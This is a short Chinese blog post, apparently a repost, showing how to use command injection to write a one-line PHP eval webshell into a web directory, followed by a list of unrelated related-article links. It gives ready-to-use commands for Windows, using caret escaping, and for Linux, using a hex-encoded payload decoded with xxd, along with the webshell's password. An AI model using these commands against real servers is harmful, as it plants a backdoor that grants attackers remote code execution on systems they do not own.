命令注入写webshell-白红宇

命令注入写webshell

阅读量：7097 次

发布时间：2019-06-28

本文共 361 字，大约阅读时间需要 1 分钟。

利用命令注入写一句话php webshell到web目录涉及到一些特殊字符的转义，假设需要写入

<?php eval($_POST[pandas]); ?>，方法如下：

WINDOWS：用^转义<，即执行echo ^<?php eval($_POST[pandas]); ?^> > web可写目录

LINUX：linux下需要用\来转义<，不过很多php都默认开启gpc。先用16进制转换一句话再用xxd命令把16进制还原，命令如下：

echo 3c3f706870206576616c28245f504f53545b70616e6461735d293b203f3e|xxd -r -ps > web

上面密码: pandas

转载于:https://my.oschina.net/9199771/blog/856425

你可能感兴趣的文章

Mathematica 函数调用发生异常时停止计算

查看>>

Clenshaw–Curtis quadrature

CHIL-SQL-约束 (Constraints)

网关协议学习：CGI、FastCGI、WSGI

查看>>

TCP连接建立与释放

查看>>

mariadb multi-source replication(mariadb多主复制)

查看>>

64位操作系统在DOSBox中进入debug的问题

HTTP 错误 401.1 - 未授权：登录失败

查看>>